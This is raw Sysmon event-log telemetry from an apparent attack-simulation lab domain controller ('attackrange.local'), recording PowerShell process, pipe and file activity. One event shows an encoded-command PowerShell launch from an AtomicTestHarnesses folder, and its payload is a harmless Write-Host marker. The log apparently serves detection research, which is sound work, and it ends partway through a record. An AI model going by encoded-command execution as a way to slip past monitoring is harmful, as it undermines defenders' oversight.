16:52:20.340{05ADC7E1-6D44-603E-5FAA-00000000AD01}7416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_1lvyo1nv.x4e.ps12021-03-02 16:52:20.340 10341000x80000000000000002235182Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.323{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D44-603E-5FAA-00000000AD01}7416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235181Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.278{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6D44-603E-5FAA-00000000AD01}7416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235180Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.278{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235179Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.278{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235178Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.278{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235177Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.278{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235176Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.278{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D44-603E-5FAA-00000000AD01}7416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002235175Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.278{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6D44-603E-5FAA-00000000AD01}7416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49a232(wow64) 154100x80000000000000002235174Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.285{05ADC7E1-6D44-603E-5FAA-00000000AD01}7416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Enc VwByAGkAdABlAC0ASABvAHMAdAAgAGYANwAwADMAZABhADkAZAAtADMAMQBkADIALQA0ADYAMgA4AC0AYQBlAGYAYwAtAGMAMQBiAGIAOAA0ADEANgA5AGQAZgBlAA==C:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002235173Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.262{05ADC7E1-6D43-603E-5EAA-00000000AD01}6940ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235172Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.153{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D43-603E-5EAA-00000000AD01}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235171Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.153{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D43-603E-5EAA-00000000AD01}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235170Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.106{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D43-603E-5EAA-00000000AD01}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235169Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.106{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D43-603E-5EAA-00000000AD01}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002235168Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.090{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E55AF428D1E54A10DF1B9925E55747F3,SHA256=9D3BD3D13333F7516E7233F580C839C8BEA4728E438CDCC641DB2204AB5AF2D4,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000002235167Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:20.074{05ADC7E1-6D43-603E-5EAA-00000000AD01}6940\PSHost.132591775399892907.6940.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002235166Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.059{05ADC7E1-6D43-603E-5EAA-00000000AD01}6940ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_pndx545d.ulj.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235165Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.059{05ADC7E1-6D43-603E-5EAA-00000000AD01}6940ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_biokdgpl.rnj.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002235164Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.043{05ADC7E1-6D43-603E-5EAA-00000000AD01}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_biokdgpl.rnj.ps12021-03-02 16:52:20.043 23542300x80000000000000002235163Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.043{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C184E51E612915E6D1B3A004C581B38,SHA256=FF7B07A8C1D6DC1FBF85ED550FF791C3C791D278BB56D99CB370977A670A8530,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235162Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.023{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D43-603E-5EAA-00000000AD01}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235287Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.903{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D45-603E-64AA-00000000AD01}7444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235286Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.903{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D45-603E-64AA-00000000AD01}7444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235285Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.856{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D45-603E-64AA-00000000AD01}7444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235284Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.856{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D45-603E-64AA-00000000AD01}7444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002235283Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:21.840{05ADC7E1-6D45-603E-64AA-00000000AD01}7444\PSHost.132591775417416725.7444.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002235282Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.818{05ADC7E1-6D45-603E-64AA-00000000AD01}7444ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_n0e3ds02.3se.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235281Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.817{05ADC7E1-6D45-603E-64AA-00000000AD01}7444ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_5gouy3w0.hbu.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002235280Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.793{05ADC7E1-6D45-603E-64AA-00000000AD01}7444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_5gouy3w0.hbu.ps12021-03-02 16:52:21.793 23542300x80000000000000002235279Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.793{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F0EA765BEA65E484EB2FCBE9091436F,SHA256=D2EC3AFBF73CC2A447353BE2CADC019963FDC149526D80A4671F8A4384F4AFD2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235278Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.778{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D45-603E-64AA-00000000AD01}7444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235277Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 